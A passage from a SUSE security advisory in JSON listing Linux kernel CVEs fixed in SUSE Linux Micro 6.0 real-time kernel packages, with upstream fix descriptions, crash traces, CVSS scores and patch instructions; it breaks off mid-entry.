XSTATE_BV[i]=0 for XFD-disabled features.\n\n[Move clea\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23005",
"url": "https://www.suse.com/security/cve/CVE-2026-23005"
},
{
"category": "external",
"summary": "SUSE Bug 1257245 for CVE-2026-23005",
"url": "https://bugzilla.suse.com/1257245"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23005"
},
{
"cve": "CVE-2026-23006",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23006"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: tlv320adcx140: fix null pointer\n\nThe \"snd_soc_component\" in \"adcx140_priv\" was only used once but never\nset. It was only used for reaching \"dev\" which is already present in\n\"adcx140_priv\".",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23006",
"url": "https://www.suse.com/security/cve/CVE-2026-23006"
},
{
"category": "external",
"summary": "SUSE Bug 1257208 for CVE-2026-23006",
"url": "https://bugzilla.suse.com/1257208"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23006"
},
{
"cve": "CVE-2026-23010",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23010"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: Fix use-after-free in inet6_addr_del().\n\nsyzbot reported use-after-free of inet6_ifaddr in\ninet6_addr_del(). [0]\n\nThe cited commit accidentally moved ipv6_del_addr() for\nmngtmpaddr before reading its ifp-\u003eflags for temporary\naddresses in inet6_addr_del().\n\nLet\u0027s move ipv6_del_addr() down to fix the UAF.\n\n[0]:\nBUG: KASAN: slab-use-after-free in inet6_addr_del.constprop.0+0x67a/0x6b0 net/ipv6/addrconf.c:3117\nRead of size 4 at addr ffff88807b89c86c by task syz.3.1618/9593\n\nCPU: 0 UID: 0 PID: 9593 Comm: syz.3.1618 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:94 [inline]\n dump_stack_lvl+0x116/0x1f0 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xcd/0x630 mm/kasan/report.c:482\n kasan_report+0xe0/0x110 mm/kasan/report.c:595\n inet6_addr_del.constprop.0+0x67a/0x6b0 net/ipv6/addrconf.c:3117\n addrconf_del_ifaddr+0x11e/0x190 net/ipv6/addrconf.c:3181\n inet6_ioctl+0x1e5/0x2b0 net/ipv6/af_inet6.c:582\n sock_do_ioctl+0x118/0x280 net/socket.c:1254\n sock_ioctl+0x227/0x6b0 net/socket.c:1375\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:597 [inline]\n __se_sys_ioctl fs/ioctl.c:583 [inline]\n __x64_sys_ioctl+0x18e/0x210 fs/ioctl.c:583\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xcd/0xf80 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\nRIP: 0033:0x7f164cf8f749\nCode: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 c7 c1 a8 ff ff ff f7 d8 64 89 01 48\nRSP: 002b:00007f164de64038 EFLAGS: 00000246 ORIG_RAX: 0000000000000010\nRAX: ffffffffffffffda RBX: 00007f164d1e5fa0 RCX: 00007f164cf8f749\nRDX: 0000200000000000 RSI: 0000000000008936 RDI: 0000000000000003\nRBP: 00007f164d013f91 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000\nR13: 00007f164d1e6038 R14: 00007f164d1e5fa0 R15: 00007ffde15c8288\n \u003c/TASK\u003e\n\nAllocated by task 9593:\n kasan_save_stack+0x33/0x60 mm/kasan/common.c:56\n kasan_save_track+0x14/0x30 mm/kasan/common.c:77\n poison_kmalloc_redzone mm/kasan/common.c:397 [inline]\n __kasan_kmalloc+0xaa/0xb0 mm/kasan/common.c:414\n kmalloc_noprof include/linux/slab.h:957 [inline]\n kzalloc_noprof include/linux/slab.h:1094 [inline]\n ipv6_add_addr+0x4e3/0x2010 net/ipv6/addrconf.c:1120\n inet6_addr_add+0x256/0x9b0 net/ipv6/addrconf.c:3050\n addrconf_add_ifaddr+0x1fc/0x450 net/ipv6/addrconf.c:3160\n inet6_ioctl+0x103/0x2b0 net/ipv6/af_inet6.c:580\n sock_do_ioctl+0x118/0x280 net/socket.c:1254\n sock_ioctl+0x227/0x6b0 net/socket.c:1375\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:597 [inline]\n __se_sys_ioctl fs/ioctl.c:583 [inline]\n __x64_sys_ioctl+0x18e/0x210 fs/ioctl.c:583\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xcd/0xf80 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nFreed by task 6099:\n kasan_save_stack+0x33/0x60 mm/kasan/common.c:56\n kasan_save_track+0x14/0x30 mm/kasan/common.c:77\n kasan_save_free_info+0x3b/0x60 mm/kasan/generic.c:584\n poison_slab_object mm/kasan/common.c:252 [inline]\n __kasan_slab_free+0x5f/0x80 mm/kasan/common.c:284\n kasan_slab_free include/linux/kasan.h:234 [inline]\n slab_free_hook mm/slub.c:2540 [inline]\n slab_free_freelist_hook mm/slub.c:2569 [inline]\n slab_free_bulk mm/slub.c:6696 [inline]\n kmem_cache_free_bulk mm/slub.c:7383 [inline]\n kmem_cache_free_bulk+0x2bf/0x680 mm/slub.c:7362\n kfree_bulk include/linux/slab.h:830 [inline]\n kvfree_rcu_bulk+0x1b7/0x1e0 mm/slab_common.c:1523\n kvfree_rcu_drain_ready mm/slab_common.c:1728 [inline]\n kfree_rcu_monitor+0x1d0/0x2f0 mm/slab_common.c:1801\n process_one_work+0x9ba/0x1b20 kernel/workqueue.c:3257\n process_scheduled_works kernel/workqu\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23010",
"url": "https://www.suse.com/security/cve/CVE-2026-23010"
},
{
"category": "external",
"summary": "SUSE Bug 1257332 for CVE-2026-23010",
"url": "https://bugzilla.suse.com/1257332"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23010"
},
{
"cve": "CVE-2026-23011",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23011"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: ip_gre: make ipgre_header() robust\n\nAnalog to commit db5b4e39c4e6 (\"ip6_gre: make ip6gre_header() robust\")\n\nOver the years, syzbot found many ways to crash the kernel\nin ipgre_header() [1].\n\nThis involves team or bonding drivers ability to dynamically\nchange their dev-\u003eneeded_headroom and/or dev-\u003ehard_header_len\n\nIn this particular crash mld_newpack() allocated an skb\nwith a too small reserve/headroom, and by the time mld_sendpack()\nwas called, syzbot managed to attach an ipgre device.\n\n[1]\nskbuff: skb_under_panic: text:ffffffff89ea3cb7 len:2030915468 put:2030915372 head:ffff888058b43000 data:ffff887fdfa6e194 tail:0x120 end:0x6c0 dev:team0\n kernel BUG at net/core/skbuff.c:213 !\nOops: invalid opcode: 0000 [#1] SMP KASAN PTI\nCPU: 1 UID: 0 PID: 1322 Comm: kworker/1:9 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025\nWorkqueue: mld mld_ifc_work\n RIP: 0010:skb_panic+0x157/0x160 net/core/skbuff.c:213\nCall Trace:\n \u003cTASK\u003e\n skb_under_panic net/core/skbuff.c:223 [inline]\n skb_push+0xc3/0xe0 net/core/skbuff.c:2641\n ipgre_header+0x67/0x290 net/ipv4/ip_gre.c:897\n dev_hard_header include/linux/netdevice.h:3436 [inline]\n neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618\n NF_HOOK_COND include/linux/netfilter.h:307 [inline]\n ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247\n NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318\n mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855\n mld_send_cr net/ipv6/mcast.c:2154 [inline]\n mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693\n process_one_work kernel/workqueue.c:3257 [inline]\n process_scheduled_works+0xad1/0x1770 kernel/workqueue.c:3340\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3421\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x510/0xa50 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23011",
"url": "https://www.suse.com/security/cve/CVE-2026-23011"
},
{
"category": "external",
"summary": "SUSE Bug 1257207 for CVE-2026-23011",
"url": "https://bugzilla.suse.com/1257207"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23011"
},
{
"cve": "CVE-2026-23017",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23017"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nidpf: fix error handling in the init_task on load\n\nIf the init_task fails during a driver load, we end up without vports and\nnetdevs, effectively failing the entire process. In that state a\nsubsequent reset will result in a crash as the service task attempts to\naccess uninitialized resources. Following trace is from an error in the\ninit_task where the CREATE_VPORT (op 501) is rejected by the FW:\n\n[40922.763136] idpf 0000:83:00.0: Device HW Reset initiated\n[40924.449797] idpf 0000:83:00.0: Transaction failed (op 501)\n[40958.148190] idpf 0000:83:00.0: HW reset detected\n[40958.161202] BUG: kernel NULL pointer dereference, address: 00000000000000a8\n...\n[40958.168094] Workqueue: idpf-0000:83:00.0-vc_event idpf_vc_event_task [idpf]\n[40958.168865] RIP: 0010:idpf_vc_event_task+0x9b/0x350 [idpf]\n...\n[40958.177932] Call Trace:\n[40958.178491] \u003cTASK\u003e\n[40958.179040] process_one_work+0x226/0x6d0\n[40958.179609] worker_thread+0x19e/0x340\n[40958.180158] ? __pfx_worker_thread+0x10/0x10\n[40958.180702] kthread+0x10f/0x250\n[40958.181238] ? __pfx_kthread+0x10/0x10\n[40958.181774] ret_from_fork+0x251/0x2b0\n[40958.182307] ? __pfx_kthread+0x10/0x10\n[40958.182834] ret_from_fork_asm+0x1a/0x30\n[40958.183370] \u003c/TASK\u003e\n\nFix the error handling in the init_task to make sure the service and\nmailbox tasks are disabled if the error happens during load. These are\nstarted in idpf_vc_core_init(), which spawns the init_task and has no way\nof knowing if it failed. If the error happens on reset, following\nsuccessful driver load, the tasks can still run, as that will allow the\nnetdevs to attempt recovery through another reset. Stop the PTP callbacks\neither way as those will be restarted by the call to idpf_vc_core_init()\nduring a successful reset.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23017",
"url": "https://www.suse.com/security/cve/CVE-2026-23017"
},
{
"category": "external",
"summary": "SUSE Bug 1257552 for CVE-2026-23017",
"url": "https://bugzilla.suse.com/1257552"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23017"
},
{
"cve": "CVE-2026-23021",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23021"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: pegasus: fix memory leak in update_eth_regs_async()\n\nWhen asynchronously writing to the device registers and if usb_submit_urb()\nfail, the code fail to release allocated to this point resources.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23021",
"url": "https://www.suse.com/security/cve/CVE-2026-23021"
},
{
"category": "external",
"summary": "SUSE Bug 1257557 for CVE-2026-23021",
"url": "https://bugzilla.suse.com/1257557"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23021"
},
{
"cve": "CVE-2026-23026",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23026"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: qcom: gpi: Fix memory leak in gpi_peripheral_config()\n\nFix a memory leak in gpi_peripheral_config() where the original memory\npointed to by gchan-\u003econfig could be lost if krealloc() fails.\n\nThe issue occurs when:\n1. gchan-\u003econfig points to previously allocated memory\n2. krealloc() fails and returns NULL\n3. The function directly assigns NULL to gchan-\u003econfig, losing the\n reference to the original memory\n4. The original memory becomes unreachable and cannot be freed\n\nFix this by using a temporary variable to hold the krealloc() result\nand only updating gchan-\u003econfig when the allocation succeeds.\n\nFound via static analysis and code review.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23026",
"url": "https://www.suse.com/security/cve/CVE-2026-23026"
},
{
"category": "external",
"summary": "SUSE Bug 1257562 for CVE-2026-23026",
"url": "https://bugzilla.suse.com/1257562"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23026"
},
{
"cve": "CVE-2026-23033",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23033"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: omap-dma: fix dma_pool resource leak in error paths\n\nThe dma_pool created by dma_pool_create() is not destroyed when\ndma_async_device_register() or of_dma_controller_register() fails,\ncausing a resource leak in the probe error paths.\n\nAdd dma_pool_destroy() in both error paths to properly release the\nallocated dma_pool resource.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23033",
"url": "https://www.suse.com/security/cve/CVE-2026-23033"
},
{
"category": "external",
"summary": "SUSE Bug 1257570 for CVE-2026-23033",
"url": "https://bugzilla.suse.com/1257570"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "low"
}
],
"title": "CVE-2026-23033"
},
{
"cve": "CVE-2026-23035",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23035"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Pass netdev to mlx5e_destroy_netdev instead of priv\n\nmlx5e_priv is an unstable structure that can be memset(0) if profile\nattaching fails.\n\nPass netdev to mlx5e_destroy_netdev() to guarantee it will work on a\nvalid netdev.\n\nOn mlx5e_remove: Check validity of priv-\u003eprofile, before attempting\nto cleanup any resources that might be not there.\n\nThis fixes a kernel oops in mlx5e_remove when switchdev mode fails due\nto change profile failure.\n\n$ devlink dev eswitch set pci/0000:00:03.0 mode switchdev\nError: mlx5_core: Failed setting eswitch to offloads.\ndmesg:\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: new profile init failed, -12\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: failed to rollback to orig profile, -12\n\n$ devlink dev reload pci/0000:00:03.0 ==\u003e oops\n\nBUG: kernel NULL pointer dereference, address: 0000000000000370\nPGD 0 P4D 0\nOops: Oops: 0000 [#1] SMP NOPTI\nCPU: 15 UID: 0 PID: 520 Comm: devlink Not tainted 6.18.0-rc5+ #115 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014\nRIP: 0010:mlx5e_dcbnl_dscp_app+0x23/0x100\nRSP: 0018:ffffc9000083f8b8 EFLAGS: 00010286\nRAX: ffff8881126fc380 RBX: ffff8881015ac400 RCX: ffffffff826ffc45\nRDX: 0000000000000000 RSI: 0000000000000001 RDI: ffff8881035109c0\nRBP: ffff8881035109c0 R08: ffff888101e3e838 R09: ffff888100264e10\nR10: ffffc9000083f898 R11: ffffc9000083f8a0 R12: ffff888101b921a0\nR13: ffff888101b921a0 R14: ffff8881015ac9a0 R15: ffff8881015ac400\nFS: 00007f789a3c8740(0000) GS:ffff88856aa59000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000370 CR3: 000000010b6c0001 CR4: 0000000000370ef0\nCall Trace:\n \u003cTASK\u003e\n mlx5e_remove+0x57/0x110\n device_release_driver_internal+0x19c/0x200\n bus_remove_device+0xc6/0x130\n device_del+0x160/0x3d0\n ? devl_param_driverinit_value_get+0x2d/0x90\n mlx5_detach_device+0x89/0xe0\n mlx5_unload_one_devl_locked+0x3a/0x70\n mlx5_devlink_reload_down+0xc8/0x220\n devlink_reload+0x7d/0x260\n devlink_nl_reload_doit+0x45b/0x5a0\n genl_family_rcv_msg_doit+0xe8/0x140",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
